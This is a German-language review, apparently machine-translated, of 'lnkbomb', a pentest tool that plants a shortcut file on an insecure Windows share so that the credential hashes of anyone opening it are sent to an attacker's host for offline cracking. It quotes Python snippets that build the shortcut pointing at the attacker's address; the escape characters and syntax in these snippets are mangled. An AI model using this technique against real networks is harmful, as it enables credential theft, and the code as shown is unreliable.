Lnkbomb – Unsichere Dateifreigaben ausnutzen – Neueste Hacking-Nachrichten

Heute habe ich ein Tool, das unsichere Dateifreigaben ausnutzt und es Penetrationstestern ermöglicht, NTLMv1- oder NTLMv2-Hashes für das Offline-Cracken zu sammeln. Das Tool heißt lnkbomb und wurde von Dievus in Python geschrieben.

Ein Beispiel aus dem Git Hub-Repo des Autors

Ausnutzung unsicherer Dateifreigaben

Nachdem die unsichere Dateifreigabe im Netzwerk entdeckt wurde, wird die Nutzlastdatei von lnkbomb direkt dorthin hochgeladen – das bedeutet, dass Sie einen ersten Zugriff benötigen. Wenn Sie sich in einer White-Box-Testumgebung befinden, ist dies ein benutzerfreundliches Tool. Die meisten Penetrationstester, die in einer Black-Box-Umgebung arbeiten, verfügen über verschiedene andere Methoden zum Sammeln dieser Informationen. Dies ist ein sehr hilfreiches Tool, um die Windows CPLINK-Schwachstelle auszunutzen.

Zunächst wird die Nutzlast direkt auf die Dateifreigabe hochgeladen. Der Penetrationstester kann dies über die Befehlszeile mit einem Python-Skript oder dem Befehl lnkbomb.exe unter Windows tun.

with open(tar_dir, 'w', newline='rn') as payload_file
payload_file.write(f"[InternetShortcut]nURL={args.attacker}nWorkingDirectory=\\{args.attacker}{directory}nIconFile=\\{args.attacker}{directory}.iconnIconIndex=1")
print(f'Malicious shortcut named {file_name}.url created in the \\{args.target}\{args.share} file share.rn')

Nachdem die Datei erstellt wurde, wird sie auf der unsicheren Dateifreigabe gespeichert. Wenn jemand die Datei öffnet, wird eine Wiederherstellungsdatei erstellt und auf dem Computer des Angreifers gespeichert

with open(f'{file_name}.recovery', 'a+') as recovery_file:
recovery_file.write(f'\{args.target}{args.share}{file_name}')
print(f'Recovery file {file_name}.recovery created in your current directory.n'

Der Penetrationstester kann dann NTLM-Hashes sammeln, indem er Responder oder SMBServer ausführt, und den Hash dann offline mit einem Tool wie Hashcat knacken.

Lnkbomb installieren

Es gibt zwei Möglichkeiten, lnkbomb zu verwenden, die in der README.md aufgeführt sind, und beide sind sehr einfach. Sie können das gefundene Repository klonen Hier, navigieren Sie zum Download-Speicherort und führen Sie lnkbomb.py mit Ihren Befehlen aus. Die Alternative besteht darin, die neueste Version auf derselben Git-Hub-Seite herunterzuladen. Hierbei handelt es sich jedoch um eine ausführbare Datei, die Sie zur Installation entpacken und ausführen müssen. Nach der Installation der .exe-Datei können Sie zum Downloadort navigieren, eine Befehlszeile öffnen und dieselben Befehle wie im Python-Skript verwenden.

Abschluss

Dieses Tool wäre bei einem Penetrationstest sehr nützlich und lässt sich sehr einfach installieren. Der Autor hat betont, dass dieses Tool unter Linux möglicherweise etwas fehlerhaft ist, aber ich habe eine Installation auf unserer Kali WSL2-GUI getestet und konnte die Nutzlast problemlos generieren. Dieses Tool erhält 4 von 5 Punkten

Möchten Sie mehr über ethisches Hacken erfahren?

Wir bieten einen Networking-Hacking-Kurs an, der auf einem ähnlichen Niveau wie OSCP ist. Sie erhalten einen exklusiven Rabatt Hier

Helfen Sie, LHN zu unterstützen, indem Sie ein T-Shirt oder eine Tasse kaufen?

Schauen Sie sich unsere Auswahl an Hier

Kennen Sie ein anderes GitHub-bezogenes Hacking-Tool?

Kontaktieren Sie uns über die Kontakt Formular Wenn Sie möchten, dass wir uns andere ethische Hacking-Tools von GitHub ansehen.

Source link

Loading...